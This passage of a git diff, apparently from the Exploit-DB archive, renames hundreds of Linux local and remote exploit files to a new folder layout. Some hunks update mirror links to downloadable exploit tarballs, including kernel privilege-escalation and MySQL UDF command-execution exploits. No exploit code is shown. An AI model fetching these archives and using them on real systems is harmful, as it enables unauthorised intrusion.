https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/platforms/linux/local/7856.txt b/exploits/linux/local/7856.txt similarity index 77% rename from platforms/linux/local/7856.txt rename to exploits/linux/local/7856.txt index 943f7ce7f..50c373a4f 100644 --- a/platforms/linux/local/7856.txt +++ b/exploits/linux/local/7856.txt @@ -3,6 +3,6 @@ MySQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) +mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/platforms/linux/local/788.pl b/exploits/linux/local/788.pl similarity index 100% rename from platforms/linux/local/788.pl rename to exploits/linux/local/788.pl diff --git a/platforms/linux/local/791.c b/exploits/linux/local/791.c similarity index 100% rename from platforms/linux/local/791.c rename to exploits/linux/local/791.c diff --git a/platforms/linux/local/792.c b/exploits/linux/local/792.c similarity index 100% rename from platforms/linux/local/792.c rename to exploits/linux/local/792.c diff --git a/platforms/linux/local/796.sh b/exploits/linux/local/796.sh similarity index 100% rename from platforms/linux/local/796.sh rename to exploits/linux/local/796.sh diff --git a/platforms/linux/local/816.c b/exploits/linux/local/816.c similarity index 100% rename from platforms/linux/local/816.c rename to exploits/linux/local/816.c diff --git a/platforms/linux/local/824.c b/exploits/linux/local/824.c similarity index 100% rename from platforms/linux/local/824.c rename to exploits/linux/local/824.c diff --git a/platforms/linux/local/8303.c b/exploits/linux/local/8303.c similarity index 100% rename from platforms/linux/local/8303.c rename to exploits/linux/local/8303.c diff --git a/platforms/linux/local/8369.sh b/exploits/linux/local/8369.sh similarity index 100% rename from platforms/linux/local/8369.sh rename to exploits/linux/local/8369.sh diff --git a/platforms/linux/local/8470.py b/exploits/linux/local/8470.py similarity index 100% rename from platforms/linux/local/8470.py rename to exploits/linux/local/8470.py diff --git a/platforms/linux/local/8478.sh b/exploits/linux/local/8478.sh similarity index 100% rename from platforms/linux/local/8478.sh rename to exploits/linux/local/8478.sh diff --git a/platforms/linux/local/8534.c b/exploits/linux/local/8534.c similarity index 100% rename from platforms/linux/local/8534.c rename to exploits/linux/local/8534.c diff --git a/platforms/linux/local/8572.c b/exploits/linux/local/8572.c similarity index 100% rename from platforms/linux/local/8572.c rename to exploits/linux/local/8572.c diff --git a/platforms/linux/local/8673.c b/exploits/linux/local/8673.c similarity index 100% rename from platforms/linux/local/8673.c rename to exploits/linux/local/8673.c diff --git a/platforms/linux/local/8678.c b/exploits/linux/local/8678.c similarity index 100% rename from platforms/linux/local/8678.c rename to exploits/linux/local/8678.c diff --git a/platforms/linux/local/876.c b/exploits/linux/local/876.c similarity index 100% rename from platforms/linux/local/876.c rename to exploits/linux/local/876.c diff --git a/platforms/linux/local/877.pl b/exploits/linux/local/877.pl similarity index 100% rename from platforms/linux/local/877.pl rename to exploits/linux/local/877.pl diff --git a/platforms/linux/local/890.pl b/exploits/linux/local/890.pl similarity index 100% rename from platforms/linux/local/890.pl rename to exploits/linux/local/890.pl diff --git a/platforms/linux/local/895.c b/exploits/linux/local/895.c similarity index 100% rename from platforms/linux/local/895.c rename to exploits/linux/local/895.c diff --git a/platforms/linux/local/91.c b/exploits/linux/local/91.c similarity index 100% rename from platforms/linux/local/91.c rename to exploits/linux/local/91.c diff --git a/platforms/linux/local/913.pl b/exploits/linux/local/913.pl similarity index 100% rename from platforms/linux/local/913.pl rename to exploits/linux/local/913.pl diff --git a/platforms/linux/local/9135.sh b/exploits/linux/local/9135.sh similarity index 100% rename from platforms/linux/local/9135.sh rename to exploits/linux/local/9135.sh diff --git a/platforms/linux/local/914.c b/exploits/linux/local/914.c similarity index 100% rename from platforms/linux/local/914.c rename to exploits/linux/local/914.c diff --git a/platforms/linux/local/9191.txt b/exploits/linux/local/9191.txt similarity index 97% rename from platforms/linux/local/9191.txt rename to exploits/linux/local/9191.txt index e31dc5d26..e51bc8c11 100644 --- a/platforms/linux/local/9191.txt +++ b/exploits/linux/local/9191.txt @@ -301,6 +301,6 @@ http://grsecurity.net/~spender/cheddar_bay.tgz -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz (2009-cheddar_bay.tgz) +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9191.tgz (2009-cheddar_bay.tgz) # milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/linux/local/9207.sh b/exploits/linux/local/9207.sh similarity index 100% rename from platforms/linux/local/9207.sh rename to exploits/linux/local/9207.sh diff --git a/platforms/linux/local/9208.txt b/exploits/linux/local/9208.txt similarity index 92% rename from platforms/linux/local/9208.txt rename to exploits/linux/local/9208.txt index c37de6789..8f6d0f5b2 100644 --- a/platforms/linux/local/9208.txt +++ b/exploits/linux/local/9208.txt @@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ -download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) +download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) # milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/linux/local/924.c b/exploits/linux/local/924.c similarity index 100% rename from platforms/linux/local/924.c rename to exploits/linux/local/924.c diff --git a/platforms/linux/local/926.c b/exploits/linux/local/926.c similarity index 100% rename from platforms/linux/local/926.c rename to exploits/linux/local/926.c diff --git a/platforms/linux/local/93.c b/exploits/linux/local/93.c similarity index 100% rename from platforms/linux/local/93.c rename to exploits/linux/local/93.c diff --git a/platforms/linux/local/9302.py b/exploits/linux/local/9302.py similarity index 100% rename from platforms/linux/local/9302.py rename to exploits/linux/local/9302.py diff --git a/platforms/linux/local/9352.c b/exploits/linux/local/9352.c similarity index 100% rename from platforms/linux/local/9352.c rename to exploits/linux/local/9352.c diff --git a/platforms/linux/local/9363.c b/exploits/linux/local/9363.c similarity index 100% rename from platforms/linux/local/9363.c rename to exploits/linux/local/9363.c diff --git a/platforms/linux/local/9435.txt b/exploits/linux/local/9435.txt similarity index 90% rename from platforms/linux/local/9435.txt rename to exploits/linux/local/9435.txt index 278afdca8..e933012ef 100644 --- a/platforms/linux/local/9435.txt +++ b/exploits/linux/local/9435.txt @@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4 */ http://www.grsecurity.net/~spender/wunderbar_emporium.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz (2009-wunderbar_emporium.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/linux/local/9436.txt b/exploits/linux/local/9436.txt similarity index 79% rename from platforms/linux/local/9436.txt rename to exploits/linux/local/9436.txt index 570172ded..43f5c62bb 100644 --- a/platforms/linux/local/9436.txt +++ b/exploits/linux/local/9436.txt @@ -4,6 +4,6 @@ Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz (2009-proto_ops.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/linux/local/9479.c b/exploits/linux/local/9479.c similarity index 100% rename from platforms/linux/local/9479.c rename to exploits/linux/local/9479.c diff --git a/platforms/linux/local/950.c b/exploits/linux/local/950.c similarity index 100% rename from platforms/linux/local/950.c rename to exploits/linux/local/950.c diff --git a/platforms/linux/local/9513.c b/exploits/linux/local/9513.c similarity index 100% rename from platforms/linux/local/9513.c rename to exploits/linux/local/9513.c diff --git a/platforms/linux/local/9521.c b/exploits/linux/local/9521.c similarity index 100% rename from platforms/linux/local/9521.c rename to exploits/linux/local/9521.c diff --git a/platforms/linux/local/9543.c b/exploits/linux/local/9543.c similarity index 100% rename from platforms/linux/local/9543.c rename to exploits/linux/local/9543.c diff --git a/platforms/linux/local/9545.c b/exploits/linux/local/9545.c similarity index 100% rename from platforms/linux/local/9545.c rename to exploits/linux/local/9545.c diff --git a/platforms/linux/local/9574.txt b/exploits/linux/local/9574.txt similarity index 92% rename from platforms/linux/local/9574.txt rename to exploits/linux/local/9574.txt index e7faec07a..385fca037 100644 --- a/platforms/linux/local/9574.txt +++ b/exploits/linux/local/9574.txt @@ -16,6 +16,6 @@ */ main: http://grsecurity.net/~spender/therebel.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz (2009-therebel.tgz) +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz (2009-therebel.tgz) # milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/platforms/linux/local/9575.c b/exploits/linux/local/9575.c similarity index 100% rename from platforms/linux/local/9575.c rename to exploits/linux/local/9575.c diff --git a/platforms/linux/local/9595.c b/exploits/linux/local/9595.c similarity index 100% rename from platforms/linux/local/9595.c rename to exploits/linux/local/9595.c diff --git a/platforms/linux/local/9598.txt b/exploits/linux/local/9598.txt similarity index 85% rename from platforms/linux/local/9598.txt rename to exploits/linux/local/9598.txt index 4e9e5341e..5b626a67c 100644 --- a/platforms/linux/local/9598.txt +++ b/exploits/linux/local/9598.txt @@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for types with mmap_zero permission it can transition, and tries to exploit the system with that types. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) # milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/linux/local/9608.c b/exploits/linux/local/9608.c similarity index 100% rename from platforms/linux/local/9608.c rename to exploits/linux/local/9608.c diff --git a/platforms/linux/local/9627.txt b/exploits/linux/local/9627.txt similarity index 94% rename from platforms/linux/local/9627.txt rename to exploits/linux/local/9627.txt index ee2c4aa67..b381a2260 100644 --- a/platforms/linux/local/9627.txt +++ b/exploits/linux/local/9627.txt @@ -37,6 +37,6 @@ */ http://www.grsecurity.net/~spender/enlightenment.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9627.tgz (2009-enlightenment.tgz) +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9627.tgz (2009-enlightenment.tgz) # milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/linux/local/9641.txt b/exploits/linux/local/9641.txt similarity index 85% rename from platforms/linux/local/9641.txt rename to exploits/linux/local/9641.txt index bddc5be22..1ce71e88c 100644 --- a/platforms/linux/local/9641.txt +++ b/exploits/linux/local/9641.txt @@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions on exploit code and libc can be referenced); Improved search and transition to SELinux types with mmap_zero permission. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) # milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/linux/local/9709.txt b/exploits/linux/local/9709.txt similarity index 100% rename from platforms/linux/local/9709.txt rename to exploits/linux/local/9709.txt diff --git a/platforms/linux/local/973.c b/exploits/linux/local/973.c similarity index 100% rename from platforms/linux/local/973.c rename to exploits/linux/local/973.c diff --git a/platforms/linux/local/974.pl b/exploits/linux/local/974.pl similarity index 100% rename from platforms/linux/local/974.pl rename to exploits/linux/local/974.pl diff --git a/platforms/linux/local/9844.py b/exploits/linux/local/9844.py similarity index 100% rename from platforms/linux/local/9844.py rename to exploits/linux/local/9844.py diff --git a/platforms/linux/local/997.sh b/exploits/linux/local/997.sh similarity index 100% rename from platforms/linux/local/997.sh rename to exploits/linux/local/997.sh diff --git a/platforms/linux/remote/10019.rb b/exploits/linux/remote/10019.rb similarity index 100% rename from platforms/linux/remote/10019.rb rename to exploits/linux/remote/10019.rb diff --git a/platforms/linux/remote/10020.rb b/exploits/linux/remote/10020.rb similarity index 100% rename from platforms/linux/remote/10020.rb rename to exploits/linux/remote/10020.rb diff --git a/platforms/linux/remote/10021.rb b/exploits/linux/remote/10021.rb similarity index 100% rename from platforms/linux/remote/10021.rb rename to exploits/linux/remote/10021.rb diff --git a/platforms/linux/remote/10023.rb b/exploits/linux/remote/10023.rb similarity index 100% rename from platforms/linux/remote/10023.rb rename to exploits/linux/remote/10023.rb diff --git a/platforms/linux/remote/10024.rb b/exploits/linux/remote/10024.rb similarity index 100% rename from platforms/linux/remote/10024.rb rename to exploits/linux/remote/10024.rb diff --git a/platforms/linux/remote/10025.rb b/exploits/linux/remote/10025.rb similarity index 100% rename from platforms/linux/remote/10025.rb rename to exploits/linux/remote/10025.rb diff --git a/platforms/linux/remote/10026.rb b/exploits/linux/remote/10026.rb similarity index 100% rename from platforms/linux/remote/10026.rb rename to exploits/linux/remote/10026.rb diff --git a/platforms/linux/remote/10027.rb b/exploits/linux/remote/10027.rb similarity index 100% rename from platforms/linux/remote/10027.rb rename to exploits/linux/remote/10027.rb diff --git a/platforms/linux/remote/10029.rb b/exploits/linux/remote/10029.rb similarity index 100% rename from platforms/linux/remote/10029.rb rename to exploits/linux/remote/10029.rb diff --git a/platforms/linux/remote/10030.rb b/exploits/linux/remote/10030.rb similarity index 100% rename from platforms/linux/remote/10030.rb rename to exploits/linux/remote/10030.rb diff --git a/platforms/linux/remote/10032.rb b/exploits/linux/remote/10032.rb similarity index 100% rename from platforms/linux/remote/10032.rb rename to exploits/linux/remote/10032.rb diff --git a/platforms/linux/remote/102.c b/exploits/linux/remote/102.c similarity index 100% rename from platforms/linux/remote/102.c rename to exploits/linux/remote/102.c diff --git a/platforms/linux/remote/1021.c b/exploits/linux/remote/1021.c similarity index 100% rename from platforms/linux/remote/1021.c rename to exploits/linux/remote/1021.c diff --git a/platforms/linux/remote/10282.py b/exploits/linux/remote/10282.py similarity index 100% rename from platforms/linux/remote/10282.py rename to exploits/linux/remote/10282.py diff --git a/platforms/linux/remote/1038.c b/exploits/linux/remote/1038.c similarity index 100% rename from platforms/linux/remote/1038.c rename to exploits/linux/remote/1038.c diff --git a/platforms/linux/remote/1047.pl b/exploits/linux/remote/1047.pl similarity index 100% rename from platforms/linux/remote/1047.pl rename to exploits/linux/remote/1047.pl diff --git a/platforms/linux/remote/1055.c b/exploits/linux/remote/1055.c similarity index 100% rename from platforms/linux/remote/1055.c rename to exploits/linux/remote/1055.c diff --git a/platforms/linux/remote/10610.rb b/exploits/linux/remote/10610.rb similarity index 100% rename from platforms/linux/remote/10610.rb rename to exploits/linux/remote/10610.rb diff --git a/platforms/linux/remote/107.c b/exploits/linux/remote/107.c similarity index 100% rename from platforms/linux/remote/107.c rename to exploits/linux/remote/107.c diff --git a/platforms/linux/remote/10980.txt b/exploits/linux/remote/10980.txt similarity index 100% rename from platforms/linux/remote/10980.txt rename to exploits/linux/remote/10980.txt diff --git a/platforms/linux/remote/110.c b/exploits/linux/remote/110.c similarity index 100% rename from platforms/linux/remote/110.c rename to exploits/linux/remote/110.c diff --git a/platforms/linux/remote/1123.c b/exploits/linux/remote/1123.c similarity index 100% rename from platforms/linux/remote/1123.c rename to exploits/linux/remote/1123.c diff --git a/platforms/linux/remote/1124.pl b/exploits/linux/remote/1124.pl similarity index 100% rename from platforms/linux/remote/1124.pl rename to exploits/linux/remote/1124.pl diff --git a/platforms/linux/remote/1138.c b/exploits/linux/remote/1138.c similarity index 100% rename from platforms/linux/remote/1138.c rename to exploits/linux/remote/1138.c diff --git a/platforms/linux/remote/1139.c b/exploits/linux/remote/1139.c similarity index 100% rename from platforms/linux/remote/1139.c rename to exploits/linux/remote/1139.c diff --git a/platforms/linux/remote/11497.txt b/exploits/linux/remote/11497.txt similarity index 100% rename from platforms/linux/remote/11497.txt rename to exploits/linux/remote/11497.txt diff --git a/platforms/linux/remote/1171.c b/exploits/linux/remote/1171.c similarity index 100% rename from platforms/linux/remote/1171.c rename to exploits/linux/remote/1171.c diff --git a/platforms/linux/remote/11720.py b/exploits/linux/remote/11720.py similarity index 100% rename from platforms/linux/remote/11720.py rename to exploits/linux/remote/11720.py diff --git a/platforms/linux/remote/11986.py b/exploits/linux/remote/11986.py similarity index 100% rename from platforms/linux/remote/11986.py rename to exploits/linux/remote/11986.py diff --git a/platforms/linux/remote/1209.c b/exploits/linux/remote/1209.c similarity index 100% rename from platforms/linux/remote/1209.c rename to exploits/linux/remote/1209.c diff --git a/platforms/linux/remote/1231.pl b/exploits/linux/remote/1231.pl similarity index 100% rename from platforms/linux/remote/1231.pl rename to exploits/linux/remote/1231.pl diff --git a/platforms/linux/remote/1232.c b/exploits/linux/remote/1232.c similarity index 100% rename from platforms/linux/remote/1232.c rename to exploits/linux/remote/1232.c diff --git a/platforms/linux/remote/1238.c b/exploits/linux/remote/1238.c similarity index 100% rename from platforms/linux/remote/1238.c rename to exploits/linux/remote/1238.c diff --git a/platforms/linux/remote/1242.pl b/exploits/linux/remote/1242.pl similarity index 100% rename from platforms/linux/remote/1242.pl rename to exploits/linux/remote/1242.pl diff --git a/platforms/linux/remote/1247.pl b/exploits/linux/remote/1247.pl similarity index 100% rename from platforms/linux/remote/1247.pl rename to exploits/linux/remote/1247.pl diff --git a/platforms/linux/remote/1258.php b/exploits/linux/remote/1258.php similarity index 100% rename from platforms/linux/remote/1258.php rename to exploits/linux/remote/1258.php diff --git a/platforms/linux/remote/12587.c b/exploits/linux/remote/12587.c similarity index 100% rename from platforms/linux/remote/12587.c rename to exploits/linux/remote/12587.c diff --git a/platforms/linux/remote/126.c b/exploits/linux/remote/126.c similarity index 100% rename from platforms/linux/remote/126.c rename to exploits/linux/remote/126.c diff --git a/platforms/linux/remote/1272.c b/exploits/linux/remote/1272.c similarity index 100% rename from platforms/linux/remote/1272.c rename to exploits/linux/remote/1272.c diff --git a/platforms/linux/remote/1288.pl b/exploits/linux/remote/1288.pl similarity index 100% rename from platforms/linux/remote/1288.pl rename to exploits/linux/remote/1288.pl diff --git a/platforms/linux/remote/1290.pl b/exploits/linux/remote/1290.pl similarity index 100% rename from platforms/linux/remote/1290.pl rename to exploits/linux/remote/1290.pl diff --git a/platforms/linux/remote/1295.c b/exploits/linux/remote/1295.c similarity index 100% rename from platforms/linux/remote/1295.c rename to exploits/linux/remote/1295.c diff --git a/platforms/linux/remote/1314.rb b/exploits/linux/remote/1314.rb similarity index 100% rename from platforms/linux/remote/1314.rb rename to exploits/linux/remote/1314.rb diff --git a/platforms/linux/remote/132.c b/exploits/linux/remote/132.c similarity index 100% rename from platforms/linux/remote/132.c rename to exploits/linux/remote/132.c diff --git a/platforms/linux/remote/1355.pl b/exploits/linux/remote/1355.pl similarity index 100% rename from platforms/linux/remote/1355.pl rename to exploits/linux/remote/1355.pl diff --git a/platforms/linux/remote/13853.pl b/exploits/linux/remote/13853.pl similarity index 100% rename from platforms/linux/remote/13853.pl rename to exploits/linux/remote/13853.pl diff --git a/platforms/linux/remote/139.c b/exploits/linux/remote/139.c similarity index 100% rename from platforms/linux/remote/139.c rename to exploits/linux/remote/139.c diff --git a/platforms/linux/remote/143.c b/exploits/linux/remote/143.c similarity index 100% rename from platforms/linux/remote/143.c rename to exploits/linux/remote/143.c diff --git a/platforms/linux/remote/1456.c b/exploits/linux/remote/1456.c similarity index 100% rename from platforms/linux/remote/1456.c rename to exploits/linux/remote/1456.c diff --git a/platforms/linux/remote/1474.pm b/exploits/linux/remote/1474.pm similarity index 100% rename from platforms/linux/remote/1474.pm rename to exploits/linux/remote/1474.pm diff --git a/platforms/linux/remote/1486.c b/exploits/linux/remote/1486.c similarity index 100% rename from platforms/linux/remote/1486.c rename to exploits/linux/remote/1486.c diff --git a/platforms/linux/remote/1487.c b/exploits/linux/remote/1487.c similarity index 100% rename from platforms/linux/remote/1487.c rename to exploits/linux/remote/1487.c diff --git a/platforms/linux/remote/14925.txt b/exploits/linux/remote/14925.txt similarity index 100% rename from platforms/linux/remote/14925.txt rename to exploits/linux/remote/14925.txt diff --git a/platforms/linux/remote/14976.txt b/exploits/linux/remote/14976.txt similarity index 100% rename from platforms/linux/remote/14976.txt rename to exploits/linux/remote/14976.txt diff --git a/platforms/linux/remote/15318.txt b/exploits/linux/remote/15318.txt similarity index 100% rename from platforms/linux/remote/15318.txt rename to exploits/linux/remote/15318.txt diff --git a/platforms/linux/remote/15449.pl b/exploits/linux/remote/15449.pl similarity index 100% rename from platforms/linux/remote/15449.pl rename to exploits/linux/remote/15449.pl diff --git a/platforms/linux/remote/15662.txt b/exploits/linux/remote/15662.txt similarity index 100% rename from platforms/linux/remote/15662.txt rename to exploits/linux/remote/15662.txt diff --git a/platforms/linux/remote/15725.pl b/exploits/linux/remote/15725.pl similarity index 100% rename from platforms/linux/remote/15725.pl rename to exploits/linux/remote/15725.pl diff --git a/platforms/linux/remote/1574.c b/exploits/linux/remote/1574.c similarity index 100% rename from platforms/linux/remote/1574.c rename to exploits/linux/remote/1574.c diff --git a/platforms/linux/remote/1578.c b/exploits/linux/remote/1578.c similarity index 100% rename from platforms/linux/remote/1578.c rename to exploits/linux/remote/1578.c diff --git a/platforms/linux/remote/15806.txt b/exploits/linux/remote/15806.txt similarity index 100% rename from platforms/linux/remote/15806.txt rename to exploits/linux/remote/15806.txt diff --git a/platforms/linux/remote/1582.c b/exploits/linux/remote/1582.c similarity index 100% rename from platforms/linux/remote/1582.c rename to exploits/linux/remote/1582.c diff --git a/platforms/linux/remote/16.c b/exploits/linux/remote/16.c similarity index 100% rename from platforms/linux/remote/16.c rename to exploits/linux/remote/16.c diff --git a/platforms/linux/remote/16285.rb b/exploits/linux/remote/16285.rb similarity index 100% rename from platforms/linux/remote/16285.rb rename to exploits/linux/remote/16285.rb diff --git a/platforms/linux/remote/16289.rb b/exploits/linux/remote/16289.rb similarity index 100% rename from platforms/linux/remote/16289.rb rename to exploits/linux/remote/16289.rb diff --git a/platforms/linux/remote/16311.rb b/exploits/linux/remote/16311.rb similarity index 100% rename from platforms/linux/remote/16311.rb rename to exploits/linux/remote/16311.rb diff --git a/platforms/linux/remote/16321.rb b/exploits/linux/remote/16321.rb similarity index 100% rename from platforms/linux/remote/16321.rb rename to exploits/linux/remote/16321.rb diff --git a/platforms/linux/remote/167.c b/exploits/linux/remote/167.c similarity index 100% rename from platforms/linux/remote/167.c rename to exploits/linux/remote/167.c diff --git a/platforms/linux/remote/16834.rb b/exploits/linux/remote/16834.rb similarity index 100% rename from platforms/linux/remote/16834.rb rename to exploits/linux/remote/16834.rb diff --git a/platforms/linux/remote/16835.rb b/exploits/linux/remote/16835.rb similarity index 100% rename from platforms/linux/remote/16835.rb rename to exploits/linux/remote/16835.rb diff --git a/platforms/linux/remote/16836.rb b/exploits/linux/remote/16836.rb similarity index 100% rename from platforms/linux/remote/16836.rb rename to exploits/linux/remote/16836.rb diff --git a/platforms/linux/remote/16837.rb b/exploits/linux/remote/16837.rb similarity index 100% rename from platforms/linux/remote/16837.rb rename to exploits/linux/remote/16837.rb diff --git a/platforms/linux/remote/16838.rb b/exploits/linux/remote/16838.rb similarity index 100% rename from platforms/linux/remote/16838.rb rename to exploits/linux/remote/16838.rb diff --git a/platforms/linux/remote/16839.rb b/exploits/linux/remote/16839.rb similarity index 100% rename from platforms/linux/remote/16839.rb rename to exploits/linux/remote/16839.rb diff --git a/platforms/linux/remote/16840.rb b/exploits/linux/remote/16840.rb similarity index 100% rename from platforms/linux/remote/16840.rb rename to exploits/linux/remote/16840.rb diff --git a/platforms/linux/remote/16841.rb b/exploits/linux/remote/16841.rb similarity index 100% rename from platforms/linux/remote/16841.rb rename to exploits/linux/remote/16841.rb diff --git a/platforms/linux/remote/16842.rb b/exploits/linux/remote/16842.rb similarity index 100% rename from platforms/linux/remote/16842.rb rename to exploits/linux/remote/16842.rb diff --git a/platforms/linux/remote/16843.rb b/exploits/linux/remote/16843.rb similarity index 100% rename from platforms/linux/remote/16843.rb rename to exploits/linux/remote/16843.rb diff --git a/platforms/linux/remote/16844.rb b/exploits/linux/remote/16844.rb similarity index 100% rename from platforms/linux/remote/16844.rb rename to exploits/linux/remote/16844.rb diff --git a/platforms/linux/remote/16845.rb b/exploits/linux/remote/16845.rb similarity index 100% rename from platforms/linux/remote/16845.rb rename to exploits/linux/remote/16845.rb diff --git a/platforms/linux/remote/16846.rb b/exploits/linux/remote/16846.rb similarity index 100% rename from platforms/linux/remote/16846.rb rename to exploits/linux/remote/16846.rb diff --git a/platforms/linux/remote/16847.rb b/exploits/linux/remote/16847.rb similarity index 100% rename from platforms/linux/remote/16847.rb rename to exploits/linux/remote/16847.rb diff --git a/platforms/linux/remote/16848.rb b/exploits/linux/remote/16848.rb similarity index 100% rename from platforms/linux/remote/16848.rb rename to exploits/linux/remote/16848.rb diff --git a/platforms/linux/remote/16849.rb b/exploits/linux/remote/16849.rb similarity index 100% rename from platforms/linux/remote/16849.rb rename to exploits/linux/remote/16849.rb diff --git a/platforms/linux/remote/16850.rb b/exploits/linux/remote/16850.rb similarity index 100% rename from platforms/linux/remote/16850.rb rename to exploits/linux/remote/16850.rb diff --git a/platforms/linux/remote/16851.rb b/exploits/linux/remote/16851.rb similarity index 100% rename from platforms/linux/remote/16851.rb rename to exploits/linux/remote/16851.rb diff --git a/platforms/linux/remote/16852.rb b/exploits/linux/remote/16852.rb similarity index 100% rename from platforms/linux/remote/16852.rb rename to exploits/linux/remote/16852.rb diff --git a/platforms/linux/remote/16853.rb b/exploits/linux/remote/16853.rb similarity index 100% rename from platforms/linux/remote/16853.rb rename to exploits/linux/remote/16853.rb diff --git a/platforms/linux/remote/16855.rb b/exploits/linux/remote/16855.rb similarity index 100% rename from platforms/linux/remote/16855.rb rename to exploits/linux/remote/16855.rb diff --git a/platforms/linux/remote/16859.rb b/exploits/linux/remote/16859.rb similarity index 100% rename from platforms/linux/remote/16859.rb rename to exploits/linux/remote/16859.rb diff --git a/platforms/linux/remote/16878.rb b/exploits/linux/remote/16878.rb similarity index 100% rename from platforms/linux/remote/16878.rb rename to exploits/linux/remote/16878.rb diff --git a/platforms/linux/remote/16887.rb b/exploits/linux/remote/16887.rb similarity index 100% rename from platforms/linux/remote/16887.rb rename to exploits/linux/remote/16887.rb diff --git a/platforms/linux/remote/16888.rb b/exploits/linux/remote/16888.rb similarity index 100% rename from platforms/linux/remote/16888.rb rename to exploits/linux/remote/16888.rb diff --git a/platforms/linux/remote/16910.rb b/exploits/linux/remote/16910.rb similarity index 100% rename from platforms/linux/remote/16910.rb rename to exploits/linux/remote/16910.rb diff --git a/platforms/linux/remote/16915.rb b/exploits/linux/remote/16915.rb similarity index 100% rename from platforms/linux/remote/16915.rb rename to exploits/linux/remote/16915.rb diff --git a/platforms/linux/remote/16916.rb b/exploits/linux/remote/16916.rb similarity index 100% rename from platforms/linux/remote/16916.rb rename to exploits/linux/remote/16916.rb diff --git a/platforms/linux/remote/16920.rb b/exploits/linux/remote/16920.rb similarity index 100% rename from platforms/linux/remote/16920.rb rename to exploits/linux/remote/16920.rb diff --git a/platforms/linux/remote/16921.rb b/exploits/linux/remote/16921.rb similarity index 100% rename from platforms/linux/remote/16921.rb rename to exploits/linux/remote/16921.rb diff --git a/platforms/linux/remote/16922.rb b/exploits/linux/remote/16922.rb similarity index 100% rename from platforms/linux/remote/16922.rb rename to exploits/linux/remote/16922.rb diff --git a/platforms/linux/remote/16924.rb b/exploits/linux/remote/16924.rb similarity index 100% rename from platforms/linux/remote/16924.rb rename to exploits/linux/remote/16924.rb diff --git a/platforms/linux/remote/16925.rb b/exploits/linux/remote/16925.rb similarity index 100% rename from platforms/linux/remote/16925.rb rename to exploits/linux/remote/16925.rb diff --git a/platforms/linux/remote/16928.rb b/exploits/linux/remote/16928.rb similarity index 100% rename from platforms/linux/remote/16928.rb rename to exploits/linux/remote/16928.rb diff --git a/platforms/linux/remote/17031.rb b/exploits/linux/remote/17031.rb similarity index 100% rename from platforms/linux/remote/17031.rb rename to exploits/linux/remote/17031.rb diff --git a/platforms/linux/remote/17058.rb b/exploits/linux/remote/17058.rb similarity index 100% rename from platforms/linux/remote/17058.rb rename to exploits/linux/remote/17058.rb diff --git a/platforms/linux/remote/171.c b/exploits/linux/remote/171.c similarity index 100% rename from platforms/linux/remote/171.c rename to exploits/linux/remote/171.c diff --git a/platforms/linux/remote/1717.c b/exploits/linux/remote/1717.c similarity index 100% rename from platforms/linux/remote/1717.c rename to exploits/linux/remote/1717.c diff --git a/platforms/linux/remote/17181.pl b/exploits/linux/remote/17181.pl similarity index 100% rename from platforms/linux/remote/17181.pl rename to exploits/linux/remote/17181.pl diff --git a/platforms/linux/remote/173.pl b/exploits/linux/remote/173.pl similarity index 100% rename from platforms/linux/remote/173.pl rename to exploits/linux/remote/173.pl diff --git a/platforms/linux/remote/174.c b/exploits/linux/remote/174.c 